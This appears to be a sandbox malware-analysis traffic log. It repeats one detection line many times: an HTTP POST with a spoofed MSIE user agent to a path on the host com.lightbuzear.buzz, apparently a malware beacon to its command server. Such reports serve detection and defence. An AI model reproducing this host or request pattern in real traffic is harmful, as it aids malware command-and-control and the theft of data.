Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Kolpt523ytcserstrew/torel HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: com.lightbuzear.buzzContent-Length: 1118Cache-Control: no-cache
